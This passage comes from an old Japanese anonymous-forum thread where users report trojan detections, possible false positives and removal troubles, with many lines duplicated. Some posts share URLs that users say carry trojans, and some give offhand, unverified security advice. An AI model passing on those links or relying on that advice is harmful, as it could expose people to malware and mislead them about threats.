exeファイルだから出やすいのかなぁ。それともマジでトロイかな。。。
でも36個中5個って微妙だなぁー。結果に統一性ないし。
5個で疑わしいと出て、5個でトロイかウイルスだと出ました。
exeファイルだから出やすいのかなぁ。それともマジでトロイかな。。。
でも36個中5個って微妙だなぁー。結果に統一性ないし。
180 :名無しさん@お腹いっぱい。:2008/10/25(土) 20:05:36
あ、179=178です。
181 :名無しさん@お腹いっぱい。:2008/10/25(土) 20:27:57
このスレ、トロイへのリンクが山ほどある
http://pc11.2ch.net/test/read.cgi/pcqa/1222422811/
http://pc11.2ch.net/test/read.cgi/pcqa/1222422811/
自己解決しましたw
VirusTotalでの結果が36のうち3つでトロイだと
言われたのですが、3つともかなり疑わしい会社で、
一つは誤検出で有名な所でした。
誤検出すると言われるトロイ名にドンピシャ。
まともな会社でのトロイ断定はノートンのみという。
まぁ、ノートンがまともかどうかは置いておいて。
他でもやりましたが、25のうち1つ2つしかトロイ認定されなかったり。
もちろんその認定したのは誤検出で有名なウイルスセキュリティ。
使ってるファイルが作られたのが約2年前ですから、
ここまで大手で検出されないと言う事はないだろうと。
VirusTotalでの結果が36のうち3つでトロイだと
言われたのですが、3つともかなり疑わしい会社で、
一つは誤検出で有名な所でした。
誤検出すると言われるトロイ名にドンピシャ。
まともな会社でのトロイ断定はノートンのみという。
まぁ、ノートンがまともかどうかは置いておいて。
他でもやりましたが、25のうち1つ2つしかトロイ認定されなかったり。
もちろんその認定したのは誤検出で有名なウイルスセキュリティ。
使ってるファイルが作られたのが約2年前ですから、
ここまで大手で検出されないと言う事はないだろうと。
183 :名無しさん@お腹いっぱい。:2008/10/25(土) 23:29:49
そういや、カスペルとかでは検出されなくて、
VirusTotalで検索すると、「トロイ」かも知れません、
みたいな感じで数個検出される時があって。
特定のトロイに断定はされないけど、
何か検索結果が微妙っていうそういう時みなさんどうしてます?
別にトロイじゃないのにそういう事になる時ってありますか?
何かすっきりしてない感じ・・・。
VirusTotalで検索すると、「トロイ」かも知れません、
みたいな感じで数個検出される時があって。
特定のトロイに断定はされないけど、
何か検索結果が微妙っていうそういう時みなさんどうしてます?
別にトロイじゃないのにそういう事になる時ってありますか?
何かすっきりしてない感じ・・・。
184 :名無しさん@お腹いっぱい。:2008/10/26(日) 12:31:23
アンケートはただひたすらウザイなぁ
185 :名無しさん@お腹いっぱい。:2008/10/28(火) 16:06:55
BNDMSS.EXEって新手のウイルス?
PC起動時からずっと動いててタスクマネージャからも停止できない…。
ググっても英語のサイトしか出てこなくてさ、
英語読めないから自動翻訳したら、どうもトロイっぽいっていうんだけど。
トレンドマイクロなんかのデータベースにも引っかからないし、何これ?
PC起動時からずっと動いててタスクマネージャからも停止できない…。
ググっても英語のサイトしか出てこなくてさ、
英語読めないから自動翻訳したら、どうもトロイっぽいっていうんだけど。
トレンドマイクロなんかのデータベースにも引っかからないし、何これ?
186 :名無しさん@お腹いっぱい。:2008/11/07(金) 13:08:31
TROJ_STARTPAなんですが、
場所がsystem32\taskmagr.exeってtaskmgr.exeとは別物ですよね?
消しちゃってもおk?
場所がsystem32\taskmagr.exeってtaskmgr.exeとは別物ですよね?
消しちゃってもおk?
187 :名無しさん@お腹いっぱい。:2008/11/07(金) 19:42:43
ごみ箱にでも移動してしばらく使って問題ないなら削除すればいいだろ
188 :名無しさん@お腹いっぱい。:2008/11/11(火) 17:16:09
ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
189 :名無しさん@お腹いっぱい。:2008/11/11(火) 23:10:08
87 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/11/11(火) 17:20:00
ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
190 :名無しさん@お腹いっぱい。:2008/11/12(水) 22:32:29
TROJ_MESOUM.AAって言うのが検出されて駆除しようとしても出来ないから隔離してるんだ
ウィルスバスターの誤作動かなんかなのかな?最近普通に使ってるだけででてくる
情報もまったく無いから困ってるんだけど、知ってる人居たら教えて欲しい。
ウィルスバスターの誤作動かなんかなのかな?最近普通に使ってるだけででてくる
情報もまったく無いから困ってるんだけど、知ってる人居たら教えて欲しい。
191 :名無しさん@お腹いっぱい。:2008/11/13(木) 01:54:18
TROJ_系統がここ最近頻発して困っております。
セーフモードで何回も削除しているのですが、
三日ぐらい経過するとリアルタイム検索に引っかかります。
その度ごとに削除すればいいでしょうか?
それとも他に何かよい方法がありますか?
セーフモードで何回も削除しているのですが、
三日ぐらい経過するとリアルタイム検索に引っかかります。
その度ごとに削除すればいいでしょうか?
それとも他に何かよい方法がありますか?
192 :名無しさん@お腹いっぱい。:2008/11/13(木) 05:35:49
統合型セキュリティソフト(無料でも有料でも良い)を導入すべきでしょう。
半端なソフトの多重ともいえる併用は止めたほうがいいよ。
半端なソフトの多重ともいえる併用は止めたほうがいいよ。
193 :191:2008/11/14(金) 22:38:54
194 :名無しさん@お腹いっぱい。:2008/11/14(金) 22:47:21
ウィルスバスターを上手く使えばいいと思うよ。
統合型ならおkさ
統合型ならおkさ
195 :名無しさん@お腹いっぱい。:2008/11/15(土) 01:12:39
>>193
たまにNorman Malware Cleanerとかでスキャンしてみるといいよ(Safeモードで)
たまにNorman Malware Cleanerとかでスキャンしてみるといいよ(Safeモードで)
196 :名無しさん@お腹いっぱい。:2008/11/15(土) 23:45:11
xfy Blog EditorのxfyBlogEditor.exeがAvira AntiVirでTR/Dropper.Gen だって
診断されるよー。
診断されるよー。
197 :名無しさん@お腹いっぱい。:2008/11/16(日) 11:34:19
TROJANE
198 :名無しさん@お腹いっぱい。:2008/11/16(日) 22:00:37
ブラクラかウィルス踏んだのかは分からないが、スパイウェアが毎日、9個見つかり、日に日に増える現象がある。
トロイの木馬か?
ウィルスバスターでは全部クッキーみたいなことらしいが・・・。
トロイの木馬か?
ウィルスバスターでは全部クッキーみたいなことらしいが・・・。
199 :名無しさん@お腹いっぱい。:2008/11/16(日) 22:08:44
>>198
eroサイトの巡回をやめれば解決する
eroサイトの巡回をやめれば解決する
200 :名無しさん@お腹いっぱい。:2008/11/17(月) 19:05:54
>>198
トラッキングcookieでは?
トラッキングcookieでは?
201 :名無しさん@お腹いっぱい。:2008/11/18(火) 22:24:05
エロサイトを巡回するとトップのショートカットがサイト固有表示→IEになる所が必ず出て来る
で、巡回を定期的に続けると最終的にほとんどがそうなり、段々とブラウザの反応速度が遅くなり、
3カ月でリカバリーする事になる
俺はいつもそう
で、巡回を定期的に続けると最終的にほとんどがそうなり、段々とブラウザの反応速度が遅くなり、
3カ月でリカバリーする事になる
俺はいつもそう
202 :名無しさん@お腹いっぱい。:2008/11/19(水) 01:14:49
トロイの木馬に感染しちゃったかも…
とりあえず、インターネットはどれもエラーで表示されない(´・ω・`)
とりあえず、インターネットはどれもエラーで表示されない(´・ω・`)
203 :名無しさん@お腹いっぱい。:2008/11/20(木) 14:28:31
2ちゃんからトロイが感染しそうになって警告でたのだが。
スパイウェアも2ちゃんからかもしれん
スパイウェアも2ちゃんからかもしれん
204 :名無しさん@お腹いっぱい。:2008/11/21(金) 19:18:26
PSW.OnlineGames.BATC
ってなんすかね
隔離だけでもんだいないっすかね
ググっても情報無いッス
ってなんすかね
隔離だけでもんだいないっすかね
ググっても情報無いッス
205 :名無しさん@お腹いっぱい。:2008/11/21(金) 19:58:18
ネトゲの中華パス抜きトロイだろ
206 :名無しさん@お腹いっぱい。:2008/11/25(火) 11:01:07
ノートンがトロイを検知しました&問題を完全に解決しましたって出たんだがエロゲのシステムファイルだった。
ただ、気になるのはそれが友人から貰ったゲームで友人はWinnyから落とした事……そしてインストールしたのは二年くらい前なんだ…………ゲームに偽装されたトロイなのか心配。
ファイル自体はexeでは無かったから安心して大丈夫?
ただ、気になるのはそれが友人から貰ったゲームで友人はWinnyから落とした事……そしてインストールしたのは二年くらい前なんだ…………ゲームに偽装されたトロイなのか心配。
ファイル自体はexeでは無かったから安心して大丈夫?
207 :名無しさん@お腹いっぱい。:2008/11/25(火) 11:03:16
>>206の補足でファイルはfpkで終わってました。
208 :名無しさん@お腹いっぱい。:2008/11/27(木) 22:34:55
自業自得
209 :名無しさん@お腹いっぱい。:2008/12/09(火) 18:18:31
ttp://www.hutechnorin.co.jp/
激しくインターネットセキリュティーが反応するけど、どいうい事なんですか?
激しくインターネットセキリュティーが反応するけど、どいうい事なんですか?
210 :名無しさん@お腹いっぱい。:2008/12/09(火) 20:07:29
どのインターネットセキュリティだよタコ
211 :名無しさん@お腹いっぱい。:2008/12/10(水) 01:29:59
すいませんです。
世界最高水準のセキュリティソフトKです。
世界最高水準のセキュリティソフトKです。
212 :名無しさん@お腹いっぱい。:2008/12/10(水) 02:31:53
菌糞太か
ならしょうがないな
ならしょうがないな
213 :名無しさん@お腹いっぱい。:2008/12/10(水) 06:14:39
駆除してたらこんな時間になっちゃったよ。
TROJ-GAMETHIE.PJの具体的な症例あったら情報求む。
種類だけでも判別したいんだけど…パス抜き系かな?
TROJ-GAMETHIE.PJの具体的な症例あったら情報求む。
種類だけでも判別したいんだけど…パス抜き系かな?
214 :名無しさん@お腹いっぱい。:2008/12/10(水) 07:01:28
ネトゲのパス抜きだろ
215 :名無しさん@お腹いっぱい。:2008/12/10(水) 17:00:22
216 :名無しさん@お腹いっぱい。:2008/12/11(木) 14:57:59
217 :名無しさん@お腹いっぱい。:2008/12/13(土) 12:10:14
TROJ_AGENT.ZZAS
というトロイの木馬が見つかりました。
対処方法を読んでも意味が分かりません、どなたか対象方法ご存知の方いませんでしょうか?^^;
教えてください、お願いします
というトロイの木馬が見つかりました。
対処方法を読んでも意味が分かりません、どなたか対象方法ご存知の方いませんでしょうか?^^;
教えてください、お願いします
218 :八頭 ◆YAGApwSaEw :2008/12/13(土) 19:36:36
>>217
TrendMicro、McAfee、NOD32などで検出駆除可能
TrendMicro、McAfee、NOD32などで検出駆除可能
219 :名無しさん@お腹いっぱい。:2008/12/14(日) 15:52:27
検知しました: トロイの木馬 Exploit.Win32.IMG-GIF.bってでました。
どういう事ですか?
すいませんが教えてください。
どういう事ですか?
すいませんが教えてください。
220 :名無しさん@お腹いっぱい。:2008/12/14(日) 16:13:26
検知したんでしょう。
221 :名無しさん@お腹いっぱい。:2008/12/15(月) 02:23:52
トロイの木馬を検知したって意味ですね
222 :名無しさん@お腹いっぱい。:2008/12/16(火) 12:07:06
検知しました: トロイの木馬 Exploit.Win32.IMG-GIF.b
どうすればいいんですか?
どうすればいいんですか?
223 :名無しさん@お腹いっぱい。:2008/12/16(火) 13:22:00
削除すればいいんじゃないかな
224 :名無しさん@お腹いっぱい。:2008/12/16(火) 15:29:55
削除すればいいでしょう。
225 :名無しさん@お腹いっぱい。:2008/12/16(火) 15:44:36
>>216
検知しますか?
検知しますか?
226 :名無しさん@お腹いっぱい。:2008/12/16(火) 23:56:58
元々使っていたデスクトップのパソコンにトロイの木馬が感染していたんですが先日パソコンを買い替えました。
まだインターネットに接続してないパソコンがセキュリティ診断に引っ掛かりトロイの木馬が検出されました。
これって無線が感染している為に新しい方もトロイの木馬が検出されたんですかね?
これの解決策はリカバリしてNTTに無線ランの交換をしてもらうのが得策なんですか?
まだインターネットに接続してないパソコンがセキュリティ診断に引っ掛かりトロイの木馬が検出されました。
これって無線が感染している為に新しい方もトロイの木馬が検出されたんですかね?
これの解決策はリカバリしてNTTに無線ランの交換をしてもらうのが得策なんですか?
227 :名無しさん@お腹いっぱい。:2008/12/18(木) 14:55:09
228 :名無しさん@お腹いっぱい。:2008/12/19(金) 19:52:37
すみません・・・
初心者ですがどうかおねがいします(涙)
vistaでAVG8.0(フリー)使ってます。スキャンかけたところ
プログラムファイル サイドバーガジェットとでました。。これは削除していいのですか?
無知な私に教えてください。。一回ダウンロードしたことがあります・・・そこからかな・・・
この検出されたファイルのプロパティ見ると作成日が数年前です。どうしたらいいんだろう・・・
初心者ですがどうかおねがいします(涙)
vistaでAVG8.0(フリー)使ってます。スキャンかけたところ
プログラムファイル サイドバーガジェットとでました。。これは削除していいのですか?
無知な私に教えてください。。一回ダウンロードしたことがあります・・・そこからかな・・・
この検出されたファイルのプロパティ見ると作成日が数年前です。どうしたらいいんだろう・・・
229 :名無しさん@お腹いっぱい。:2008/12/19(金) 21:16:45
230 :名無しさん@お腹いっぱい。:2008/12/20(土) 23:04:20
231 :名無しさん@お腹いっぱい。:2008/12/21(日) 04:28:24
トロイ注意
ttp://www.trigem.com/jp/product/product_overview.asp?category=2&seq=61
トライジェムっていうあまり有名ではないと思うメーカーのノートPCのサイトで
カスペがExploit.SWF.Downloader.loとTrojan-Downloader.JS.Agent.ddq
ってのを検出したんですが、これはどのくらい危険なものなんでしょうか?
誤検出ってことはないですよね…
ttp://www.trigem.com/jp/product/product_overview.asp?category=2&seq=61
トライジェムっていうあまり有名ではないと思うメーカーのノートPCのサイトで
カスペがExploit.SWF.Downloader.loとTrojan-Downloader.JS.Agent.ddq
ってのを検出したんですが、これはどのくらい危険なものなんでしょうか?
誤検出ってことはないですよね…
232 :名無しさん@お腹いっぱい。:2008/12/21(日) 23:28:49
ちょっと質問させてください。
TROJ_AGENT.AFZPっていうのが検出されます。
稀に海外のエロサイトに繋いだ時にトロイを拾うことはありましたが
昨日から回線を繋いだだけなのに↑のウイルスを拾ってしまうようになりました。
ウイルスバスター2006がきちんと隔離してくれるのですが
回線に接続しただけでもトロイを拾ってしまうものなんでしょうか?
こういった経験が無いため少々心配になっているのですが
対策やアドバイスがありましたらお教え願います。
TROJ_AGENT.AFZPっていうのが検出されます。
稀に海外のエロサイトに繋いだ時にトロイを拾うことはありましたが
昨日から回線を繋いだだけなのに↑のウイルスを拾ってしまうようになりました。
ウイルスバスター2006がきちんと隔離してくれるのですが
回線に接続しただけでもトロイを拾ってしまうものなんでしょうか?
こういった経験が無いため少々心配になっているのですが
対策やアドバイスがありましたらお教え願います。
233 :八頭 ◆YAGApwSaEw :2008/12/23(火) 00:42:29
ウイルスバスター2006は、2005年発売なんで
最新のマルウェアに対するセキュリティソフトとしては役に立たないよ
最新のマルウェアに対するセキュリティソフトとしては役に立たないよ
>>233
アップデートは毎日行って最新の状態でも
2006年版を使うのは問題ありという事でしょうか?
昨日今日だけで
TROJ_BHO.LY
TROJ_AGENT.AFZP
TROJ_VUNDO.DJH
これだけ検出されました
何処からかウイルスを送られているのか
2〜3時間おきにウイルスバスターが反応しています。
素直に最新版に変えた方がいいのか…。
アップデートは毎日行って最新の状態でも
2006年版を使うのは問題ありという事でしょうか?
昨日今日だけで
TROJ_BHO.LY
TROJ_AGENT.AFZP
TROJ_VUNDO.DJH
これだけ検出されました
何処からかウイルスを送られているのか
2〜3時間おきにウイルスバスターが反応しています。
素直に最新版に変えた方がいいのか…。
235 :名無しさん@お腹いっぱい。:2008/12/23(火) 12:25:56
トロイ系なら、カスペルスキーがおぬぬめ。
バスターなんて、もってのほか。
バスターなんて、もってのほか。
236 :名無しさん@お腹いっぱい。:2008/12/23(火) 15:57:30
>>233>>235>>236
アドバイスありがとうございます。
同じ様な症状が以前より多数報告されているんですね。
他のスレでも同じウイルスが検出されたとの書き込みがあったので
皆さんのご意見を参考に対応してみます。
どうもありがとうございました。
アドバイスありがとうございます。
同じ様な症状が以前より多数報告されているんですね。
他のスレでも同じウイルスが検出されたとの書き込みがあったので
皆さんのご意見を参考に対応してみます。
どうもありがとうございました。
238 :名無しさん@お腹いっぱい。:2008/12/27(土) 15:11:32
TROJ_AGENT.AFZP
こいつが、削除できん。
ウイルスバスターで3時間おきぐらいに
抽出してくる。
こいつが、削除できん。
ウイルスバスターで3時間おきぐらいに
抽出してくる。
239 :名無しさん@お腹いっぱい。:2008/12/27(土) 18:24:15
240 :名無しさん@お腹いっぱい。:2008/12/27(土) 18:49:41
所詮台湾製だし
241 :名無しさん@お腹いっぱい。:2008/12/28(日) 00:51:53
糞バスターや糞AVG使うぐらいならウイルスセキュリティZEROの方がよっぽどマシ
というかウイルスセキュリティZEROは神製品
というかウイルスセキュリティZEROは神製品
242 :名無しさん@お腹いっぱい。:2008/12/28(日) 04:07:05
>>238>>239
うちは2時間おきに、それも決まって11分になるとウイルスが検出される。
同じ名前のウイルスが複数ひっかかったり、データベースにないウイルスが来たりでこの4〜5日特に酷い。
隔離不能の時はファイル名を見て手動で検索するんだけどウイルスが検出されず…。
特に不具合は見られないけど、どうなってるのか不安。
うちは2時間おきに、それも決まって11分になるとウイルスが検出される。
同じ名前のウイルスが複数ひっかかったり、データベースにないウイルスが来たりでこの4〜5日特に酷い。
隔離不能の時はファイル名を見て手動で検索するんだけどウイルスが検出されず…。
特に不具合は見られないけど、どうなってるのか不安。
243 :名無しさん@お腹いっぱい。:2008/12/28(日) 06:57:16
http://oshiete.optcom.jp/qa4275025.html?ans_count_asc=0
これは誤検知でしょうか?
私もAVG Internet Securityで同じ反応が出ています。
これは誤検知でしょうか?
私もAVG Internet Securityで同じ反応が出ています。
244 :名無しさん@お腹いっぱい。:2008/12/28(日) 12:22:00
>こんにちは。
>私はクラッカーコミュティーの潜入調査や対策ソフトの多角的性能テストなどをしております。
なんだこの回答者。この板で荒らしてる奴か?
>私はクラッカーコミュティーの潜入調査や対策ソフトの多角的性能テストなどをしております。
なんだこの回答者。この板で荒らしてる奴か?
245 :!omikuji !dama:2009/01/03(土) 02:19:44
新年発カキコ
246 :名無しさん@お腹いっぱい。:2009/01/11(日) 17:34:34
先日木馬に感染しました
ウイルスバスターでウイルスを削除したので木馬は退治したのかと思いました
しかしウイルスは検索されないのですが
スパイウェアが削除しても削除しても検索するたびに検索されるのですがこれは木馬の影響があるのでしょうか?
どなたか対策を教えていただけませんでしょうか?
隔離ファイルにあるスパイウェアも全削除したほうが良いのですかね?
ウイルスバスターでウイルスを削除したので木馬は退治したのかと思いました
しかしウイルスは検索されないのですが
スパイウェアが削除しても削除しても検索するたびに検索されるのですがこれは木馬の影響があるのでしょうか?
どなたか対策を教えていただけませんでしょうか?
隔離ファイルにあるスパイウェアも全削除したほうが良いのですかね?
247 :名無しさん@お腹いっぱい。:2009/01/11(日) 17:54:57
246続き
今バスターでウイルス検索のみしてみたらウイルス処理できませんと出ます
ウイルス、スパイウェア、セキュリティホールまとめて検索してたのですが
スパイウェアにみ毎回検索されてましたからウイルスはなしと思っていたのですが
これはウイルスは検索すらしてなかったという事でしょうか?
マジ怖いんですけど
今バスターでウイルス検索のみしてみたらウイルス処理できませんと出ます
ウイルス、スパイウェア、セキュリティホールまとめて検索してたのですが
スパイウェアにみ毎回検索されてましたからウイルスはなしと思っていたのですが
これはウイルスは検索すらしてなかったという事でしょうか?
マジ怖いんですけど
248 :名無しさん@お腹いっぱい。:2009/01/11(日) 19:17:55
249 :名無しさん@お腹いっぱい。:2009/01/11(日) 19:55:11
250 :名無しさん@お腹いっぱい。:2009/01/12(月) 01:29:28
251 :名無しさん@お腹いっぱい。:2009/01/12(月) 03:55:25
>>250
自分で調べてみると良いぞ。この世に安くて高性能な物なんて無い(特に工業製品は、ソフトもだが)
世界シェアでは、1位Symantec、2位Mcafeeだが、評価版を使ってみるのも良いかと。
あと、セキュリティーソフトは主に防御のためにあるので駆除ツールとしての期待はあまりしない方がよいと思う。
マルウエアにやられたら、クリーンインストが基本。そのために大事なファイルはバックアップしておくことが大事。
自分で調べてみると良いぞ。この世に安くて高性能な物なんて無い(特に工業製品は、ソフトもだが)
世界シェアでは、1位Symantec、2位Mcafeeだが、評価版を使ってみるのも良いかと。
あと、セキュリティーソフトは主に防御のためにあるので駆除ツールとしての期待はあまりしない方がよいと思う。
マルウエアにやられたら、クリーンインストが基本。そのために大事なファイルはバックアップしておくことが大事。
252 :名無しさん@お腹いっぱい。:2009/01/13(火) 00:58:49
TROJ Generic.DITが検出されました。誤検出の可能性のあるようですが詳細がよく分かりません。ググっても駄目でした。これはどういった症状が出るものなのか、どなたかご存知ありませんか
253 :名無しさん@お腹いっぱい。:2009/01/13(火) 23:02:42
DITってことは未知のものである可能性と誤検出の可能性がある。ただ未知である可能性の方が高いので削除しておいた方が無難。症状も未報告。
他スレでは復元ポイントに潜んでる場合もあると聞いた。その場合は復元ポイントごと削除するのが無難。復元ポイントはまた復活させればいいので早めに対応しておきな
他スレでは復元ポイントに潜んでる場合もあると聞いた。その場合は復元ポイントごと削除するのが無難。復元ポイントはまた復活させればいいので早めに対応しておきな
254 :名無しさん@お腹いっぱい。:2009/01/19(月) 20:17:08
ビスタってワームを自動的に処理するらしいな
255 :名無しさん@お腹いっぱい。:2009/01/25(日) 01:31:20
>>254
したことがないのは俺だけ?
したことがないのは俺だけ?
256 :名無しさん@お腹いっぱい。:2009/01/27(火) 05:17:56
昨日まで普通に見られた動画サイト。
数時間前から重すぎてみられなくなり
この時間帯何回開いてもトロイの木馬が検出される。
なーぜー
数時間前から重すぎてみられなくなり
この時間帯何回開いてもトロイの木馬が検出される。
なーぜー
257 :名無しさん@お腹いっぱい。:2009/01/27(火) 21:33:38
しらんわそんなもん
自分で検索汁だらだら
自分で検索汁だらだら
258 :名無しさん@お腹いっぱい。:2009/01/27(火) 21:38:06
259 :名無しさん@お腹いっぱい。:2009/01/27(火) 22:55:16
おいおい冷たいな。
検索しまくっても出ないんだよなぁ。
アダルトサイトじゃねーよ。
検索しまくっても出ないんだよなぁ。
アダルトサイトじゃねーよ。
260 :名無しさん@お腹いっぱい。:2009/01/27(火) 23:04:40
検出されるんならトロイの木馬が原因だろ
諦めてリカバリしろ
諦めてリカバリしろ
261 :名無しさん@お腹いっぱい。:2009/01/28(水) 00:12:56
>>259
あんただれ?
あんただれ?
262 :名無しさん@お腹いっぱい。:2009/01/28(水) 00:20:27
まぁ、オレはもう慣れっこだけどねww
263 :名無しさん@お腹いっぱい。:2009/01/28(水) 01:30:58
264 :名無しさん@お腹いっぱい。:2009/01/28(水) 01:31:50
ひょっとして、アンカーの付け方知らない人かなぁ。
まぁいいや。
まぁいいや。
265 :名無しさん@お腹いっぱい。:2009/01/30(金) 13:21:07
ぁーあ。。。。。。。。。。
266 :名無しさん@お腹いっぱい。:2009/01/30(金) 14:14:35
・・。
267 :名無しさん@お腹いっぱい。:2009/02/23(月) 11:56:25
ウイルスチェックしてたら、
\system32\AutoExe.exeが、
Backdoor.Win32.BlackHole.2005.aに感染しています。
と出ました。
駆除方法など検索しても皆無…
ちなみに安置ウイルスソフトはウイルスセキュリティで、
「ファイルは使用中」「隔離できません」と出ています。
どうしたらいいですか・・・・・
\system32\AutoExe.exeが、
Backdoor.Win32.BlackHole.2005.aに感染しています。
と出ました。
駆除方法など検索しても皆無…
ちなみに安置ウイルスソフトはウイルスセキュリティで、
「ファイルは使用中」「隔離できません」と出ています。
どうしたらいいですか・・・・・
268 :名無しさん@お腹いっぱい。:2009/02/23(月) 13:15:30
SafeModeで消せば?
269 :名無しさん@お腹いっぱい。:2009/02/25(水) 20:03:12
感染して文字化けしたファイルは
どうやって消すの?
トロ。。。みたいなかんじで出る
どうやって消すの?
トロ。。。みたいなかんじで出る
270 :名無しさん@お腹いっぱい。:2009/02/25(水) 21:13:57
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SEMAPI.A&VSect=T
これ見たら、どう対処すれば良いかわかるだろw
単純に
>AutoExe.exe こいつを削除
これ見たら、どう対処すれば良いかわかるだろw
単純に
>AutoExe.exe こいつを削除
271 :270:2009/02/25(水) 21:16:42
レジストリエディタを使用するんだよw
272 :名無しさん@お腹いっぱい。:2009/02/25(水) 21:17:54
最近、PCの起動時に黒いウィンドウで名前が、〜spy.exeという表示が一瞬出るんです。怪しいと思い検索したのですが正体が掴めません。検索結果にトロイがヒットしたので質問させていただきました。トロイの木馬なのでしょうか。よろしくお願いします。
273 :270:2009/02/25(水) 21:24:29
一口にトロイの木馬と言っても、セキュリティソフトメーカーにより
コードネームが異なるからなあ。
〜spy.exe こういうのは削除して良いよ。
コードネームが異なるからなあ。
〜spy.exe こういうのは削除して良いよ。
274 :名無しさん@お腹いっぱい。:2009/02/25(水) 21:37:10
>>273
ありがとうございます。メーカーはマカフィーです。消去したいのですが、ウィルススキャンしても検出されません。他に方法で消去するのでしょうか。度々すみません。
ありがとうございます。メーカーはマカフィーです。消去したいのですが、ウィルススキャンしても検出されません。他に方法で消去するのでしょうか。度々すみません。
275 :名無しさん@お腹いっぱい。:2009/02/25(水) 22:12:45
276 :名無しさん@お腹いっぱい。:2009/02/25(水) 22:20:06
>ウィルススキャンしても検出されません。
>PCの起動時に黒いウィンドウで
これが、その理由
Antivarだろうが、AVG、Ad-wear、etc..だろうが、応急処置で導入しても駄目。
マカフィーを使い続けたいならリカバリーか、
邪道であるが、総合セキュリティソフト統合型のカスペを一時的に
入れて、駆除後に、マカフィーとスワップしてしまえば良いね。
>>274
>PCの起動時に黒いウィンドウで
これが、その理由
Antivarだろうが、AVG、Ad-wear、etc..だろうが、応急処置で導入しても駄目。
マカフィーを使い続けたいならリカバリーか、
邪道であるが、総合セキュリティソフト統合型のカスペを一時的に
入れて、駆除後に、マカフィーとスワップしてしまえば良いね。
>>274
277 :名無しさん@お腹いっぱい。:2009/02/25(水) 22:47:05
難しそうですが、やってみます。ありがとうございました。
278 :276:2009/02/25(水) 22:54:28
乙です。 >>277
279 :名無しさん@お腹いっぱい。:2009/03/02(月) 22:44:57
TROJ_FAKEAV.ANA,TROJ_AGENT.ANDY
に感染し、修復しましたが、windows update、シマンテックオンラインスキャン等につながらず、ウィルス対策ソフトがインストールできなくなりました。解決の仕方を知って見えたらお教え願います。
に感染し、修復しましたが、windows update、シマンテックオンラインスキャン等につながらず、ウィルス対策ソフトがインストールできなくなりました。解決の仕方を知って見えたらお教え願います。
280 :名無しさん@お腹いっぱい。:2009/03/03(火) 05:36:01
cookie_Atwolaを放置はまずい?
281 :名無しさん@お腹いっぱい。:2009/03/03(火) 06:54:20
282 :名無しさん@お腹いっぱい。:2009/03/04(水) 22:57:04
すみません質問です。
トロイに感染してしまって色々調べたのですが、「ネトゲのパス抜き」とはパスワードを奪われる症状を指すのですか?妹のPCが感染したようですが彼女はネトゲをしないので放置しても大丈夫でしょうか?
その他パソコンに入っている暗証番号などが無作為に奪われてしまうものなのでしたら早急に対処したいのですが…ご存じの方おられましたら回答お願いします。
トロイに感染してしまって色々調べたのですが、「ネトゲのパス抜き」とはパスワードを奪われる症状を指すのですか?妹のPCが感染したようですが彼女はネトゲをしないので放置しても大丈夫でしょうか?
その他パソコンに入っている暗証番号などが無作為に奪われてしまうものなのでしたら早急に対処したいのですが…ご存じの方おられましたら回答お願いします。
283 :名無しさん@お腹いっぱい。:2009/03/04(水) 23:52:39
どっちにしても放置しないでちゃんと削除すればいいじゃない
284 :名無しさん@お腹いっぱい。:2009/03/06(金) 10:21:20
トロイのURL(末尾が.exe)を誤ってクリックしてしまい、ウィンドウズのダウンロードするかしないかの警告で結局ダウンロードしなかったんですが、これはギリギリセーフと考えていいでしょうか?
285 :名無しさん@お腹いっぱい。:2009/03/08(日) 12:10:20
シマンテックウイルススキャンで〜.tmpからトロイ(名前は表示されなかった)が検出されたんだけど、削除だけでおkですか?
その後スキャン(niftyとシマンテック)しても発見されず、特に目立つ症状もなしです。
その後スキャン(niftyとシマンテック)しても発見されず、特に目立つ症状もなしです。
286 :名無しさん@お腹いっぱい。:2009/03/09(月) 13:49:12
突然このように書かれた mutation of trojan virus ウィンドウが開くようになりました。
ウィルスセキュリティーZEROでチェックしても何も検出されませんでした。
どうすればいいでしょうか?
ウィルスセキュリティーZEROでチェックしても何も検出されませんでした。
どうすればいいでしょうか?
287 :名無しさん@お腹いっぱい。:2009/03/09(月) 16:39:56
>>284
たぶん大丈夫です
念のためウイルススキャンすればいいかと
>>285
常駐のウイルス対策をしてください
>>286
まずは検出率の低いと言われるウィルスセキュリティZEROをやめて他のものに乗り換えてみてはいかがでしょう
たぶん大丈夫です
念のためウイルススキャンすればいいかと
>>285
常駐のウイルス対策をしてください
>>286
まずは検出率の低いと言われるウィルスセキュリティZEROをやめて他のものに乗り換えてみてはいかがでしょう
289 :名無しさん@お腹いっぱい。:2009/03/10(火) 14:13:12
290 :名無しさん@お腹いっぱい。:2009/03/12(木) 18:33:04
すいません。
教えてください。
Windows defenderの方でも質問したのですが、
パソコンを起動する度にWindows defenderが「Trojan:Win32/AgentBypass.gen!K」を検出し削除するのですが、再起動する度に検出します。
システムの復元を無効にしてもダメでした。
なので、Windows defenderで削除せず、カスペルやマイクロトレンドのオンラインスキャン、ノートンでスキャンするのですが検出されません。
Windows defender以外では一切検出されないので困っています。
やはりOS再インストールしかないのでしょうか?
それとも誤検出の可能性があるのでしょうか?
教えていただけると助かります。
教えてください。
Windows defenderの方でも質問したのですが、
パソコンを起動する度にWindows defenderが「Trojan:Win32/AgentBypass.gen!K」を検出し削除するのですが、再起動する度に検出します。
システムの復元を無効にしてもダメでした。
なので、Windows defenderで削除せず、カスペルやマイクロトレンドのオンラインスキャン、ノートンでスキャンするのですが検出されません。
Windows defender以外では一切検出されないので困っています。
やはりOS再インストールしかないのでしょうか?
それとも誤検出の可能性があるのでしょうか?
教えていただけると助かります。
291 :名無しさん@お腹いっぱい。:2009/03/12(木) 19:07:54
